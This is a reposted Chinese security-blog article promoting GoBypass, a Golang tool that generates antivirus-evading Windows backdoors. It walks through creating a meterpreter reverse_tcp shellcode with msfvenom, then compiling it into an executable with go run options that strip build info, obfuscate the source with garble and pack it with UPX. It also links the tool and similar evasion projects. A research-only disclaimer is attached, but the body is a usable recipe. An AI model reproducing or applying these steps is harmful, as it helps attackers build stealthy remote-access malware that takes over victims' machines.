GoBypass免杀生成工具分享

admin 2025年1月13日10:34:04评论25 views字数 966阅读3分13秒阅读模式
Golang免杀生成工具,参考网上已有的免杀方式实现的半自动免杀马生成工具,需要本地安装Golang环境,支持多种参数与方式生成。

项目地址:

https://github.com/4ra1n/GoBypass

0x01 免责声明

该工具仅用于安全研究,禁止使用工具发起非法攻击等违法行为,造成的后果使用者负责。

0x02 介绍

Golang免杀马生成工具(该工具仅针对Windows系统),不确定免杀效果如何,核心部分借鉴大佬的代码然后自己造轮子。

使用参考视频:

暂时无法播放,可回源网站播放

GoBypass免杀生成工具分享

0x03 准备工作

在kali中使用msfvenom生成需要的payload(注意使用-f c参数),示例:

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=ip lport=port -f c

复制完整C语言格式的shellcode并写入当前目录的shellcode.txt(无需过多处理,内部会对ShellCode进行编码)

0x04 生成免杀马

在生成免杀马之前请注意以下三件事:

确保安装Golang且环境变量中包含go,否则无法编译请在当前目录先执行go env -w GO111MODULE=on,然后go mod download命令下载依赖如果下载依赖过慢,配置镜像go env -w GOPROXY=https://mirrors.aliyun.com/goproxy

一切就绪后就可以开始生成了,示例:

使用CreateThread模块并删除编译信息:go run main.go -m CreateThread -d删除编译信息且用garble混淆源码后编译:go run main.go -m CreateThread -d -g编译后的可执行文件进行upx加壳:go run main.go -m CreateThread -d -g -u

可选参数如下:

GoBypass免杀生成工具分享

其中必须的模块参数如下:

GoBypass免杀生成工具分享

0x05 参考

尤其感谢Safe6Sec师傅的项目

https://github.com/safe6Sec/GolangBypassAVhttps://github.com/Ne0nd0g/go-shellcod

↓↓↓

我知道你在看

原文始发于微信公众号(EchoSec):神兵利器 | GoBypass免杀生成工具分享(附下载)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年1月13日10:34:04
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   GoBypass免杀生成工具分享https://cn-sec.com/archives/1103716.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息